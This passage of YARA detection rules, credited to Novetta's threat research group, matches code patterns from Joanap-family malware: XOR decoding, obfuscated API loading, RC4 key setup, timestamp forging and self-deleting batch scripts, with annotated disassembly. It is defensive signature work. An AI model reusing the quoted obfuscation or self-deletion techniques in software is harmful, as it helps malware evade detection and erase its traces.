pe.sections[pe.section_index(".text")].raw_data_size)) } rule XORDecodeA7: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 8A 04 17 mov al, [edi+edx] 8B FB mov edi, ebx 34 A7 xor al, 0A7h 46 inc esi 88 02 mov [edx], al 83 C9 FF or ecx, 0FFFFFFFFh 33 C0 xor eax, eax 42 inc edx F2 AE repne scasb F7 D1 not ecx 49 dec ecx 3B F1 cmp esi, ecx */ $a = { 8A [2] 8B ?? 34 A7 46 88 ?? 83 ?? FF 33 ?? 4? F2 AE F7 ?? 4? 3B ?? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule DynamicAPILoading: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 83 C4 04 add esp, 4 50 push eax ; lpProcName 56 push esi ; hModule FF 15 20 F0 40 00 call ds:GetProcAddress 68 A8 0C 41 00 push offset aLo_adlIbr_arYw; "Lo.adL ibr.ar yW" A3 DC 3E 41 00 mov GetProcAddress_0, eax E8 7D FF FF FF call CleanupString 83 C4 04 add esp, 4 50 push eax ; _DWORD 56 push esi ; _DWORD FF 15 DC 3E 41 00 call GetProcAddress_0 68 94 0C 41 00 push offset aLoad_LibR_arYa; "Load. Lib r.ar yA" A3 D4 3E 41 00 mov LoadLibraryW, eax E8 63 FF FF FF call CleanupString 83 C4 04 add esp, 4 50 push eax ; _DWORD 56 push esi ; _DWORD FF 15 DC 3E 41 00 call GetProcAddress_0 68 80 0C 41 00 push offset a_frE_eliBr_arY; ".Fr e.eLi br.ar y" A3 D8 3E 41 00 mov LoadLibraryA_0, eax E8 49 FF FF FF call CleanupString */ $a = { 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8 [4] 83 C4 ?? 5? 5? FF 15 [4] 68 [4] A3 [4] E8} condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule DNSCalcStyleEncodeAndDecode: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "975522bc3e07f7aa2c4a5457e6cc16c49a148b9f731134b8971983225835577e" strings: /* 8A 10 mov dl, [eax] 80 F2 73 xor dl, 73h <--- for decoding and encoding, this and 80 EA 3A sub dl, 3Ah <--- this could be reversed, but the sig holds since both are 0x80 88 10 mov [eax], dl 40 inc eax 49 dec ecx 75 F2 jnz short loc_1000403C */ $a = {8A ?? 80 ?? ?? 80 ?? ?? 88 ?? 4? 4? 75 ?? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule GenerateTLSClientHelloPacket_Test: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "eff542ac8e37db48821cb4e5a7d95c044fff27557763de3a891b40ebeb52cc55.ex_" strings: /* 25 07 00 00 80 and eax, 80000007h 79 05 jns short loc_405EC8; um, nope.. this will always happen 48 dec eax 83 C8 F8 or eax, 0FFFFFFF8h 40 inc eax */ $a = {25 07 00 00 80 79 ?? 4? 83 ?? F8 4? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule RC4SboxKeyGen: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "RT_RCDATA_101.bin.bin" strings: /* 8A 4C 04 08 mov cl, [esp+eax+108h+sbox]; cl = sbox[i] 8B D0 mov edx, eax 81 E2 0F 00 00 80 and edx, 8000000Fh ; i % 16 79 05 jns short loc_10003AC8; dl = key[i & 16] 4A dec edx 83 CA F0 or edx, 0FFFFFFF0h 42 inc edx */ $a = { 8A [3] 8B ?? 81 ?? 0F 00 00 80 79 ?? 4? 83 ?? F0 4? } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule RandomTimestampGenerator: sharedcode { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "RT_RCDATA_101.bin.bin joanap baseline sample" strings: /* 66 81 44 24 0C FE FF add [esp+1Ch+SystemTime.wYear], 0FFFEh FF D6 call esi ; rand 99 cdq B9 0C 00 00 00 mov ecx, 0Ch F7 F9 idiv ecx 42 inc edx 66 89 54 24 0E mov [esp+1Ch+SystemTime.wMonth], dx FF D6 call esi ; rand 99 cdq B9 1C 00 00 00 mov ecx, 1Ch F7 F9 idiv ecx 42 inc edx 66 89 54 24 12 mov [esp+1Ch+SystemTime.wDay], dx FF D6 call esi ; rand 99 cdq B9 17 00 00 00 mov ecx, 17h F7 F9 idiv ecx 42 inc edx 66 89 54 24 14 mov [esp+1Ch+SystemTime.wHour], dx FF D6 call esi ; rand 99 cdq B9 3B 00 00 00 mov ecx, 3Bh F7 F9 idiv ecx 42 inc edx 66 89 54 24 16 mov [esp+1Ch+SystemTime.wMinute], dx FF D6 call esi ; rand 99 cdq B9 3B 00 00 00 mov ecx, 3Bh F7 F9 idiv ecx */ $a = { 66 81 [3] FE FF FF [1-4] 99 B9 0C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 1C 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 17 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 [1-4] 42 66 89 [3] FF D6 99 B9 3B 00 00 00 F7 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } rule CPUInfoExtraction { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" Source = "Cmd10010_296fcc9d611ca1b8f8288192d6d854cf4072853010cc65cb0c7f958626999fbd.bin" strings: /* 68 00 00 00 80 push 80000000h ; a2 8B 02 mov eax, [edx] 8B 4A 04 mov ecx, [edx+4] 89 4C 24 10 mov [esp+2Ch+var_1C], ecx 8B 4A 08 mov ecx, [edx+8] 89 4C 24 14 mov [esp+2Ch+var_18], ecx 8B 4A 0C mov ecx, [edx+0Ch] 8D 54 24 1C lea edx, [esp+2Ch+var_10] 89 8E 70 03 00 00 mov [esi+370h], ecx 52 push edx ; a1 8B CE mov ecx, esi 89 86 6C 03 00 00 mov [esi+36Ch], eax E8 29 FF FF FF call GetCPUIDValues 8B C8 mov ecx, eax 8B 01 mov eax, [ecx] 3D 00 00 00 80 cmp eax, 80000000h 8B 51 04 mov edx, [ecx+4] */ $a = {68 00 00 00 80 8B ?? 8B ?? 04 89 [3] 8B ?? 08 89 [3] 8B ?? 0C 8D [3] 89 [5] 5? 8B ?? 89 [5] E8 [4] 8B ?? 8B ?? 3D 00 00 00 80 8B ?? 04 } condition: $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) } // yara sigs for detecting common suicide scripts rule SuicideScriptL1 { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = ":L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n" condition: any of them } rule SuicideScriptR1_Multi { meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = "\" goto R1\ndel /a \"" $ = "\"\nif exist \"" $ = "@echo off\n:R1\ndel /a \"" condition: all of them } rule SuicideScriptR { // joanap, joanapCleaner meta: copyright = "2015 Novetta Solutions" author = "Novetta Threat Research & Interdiction Group - trig@novetta.com" strings: $ = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat" condition: all of them }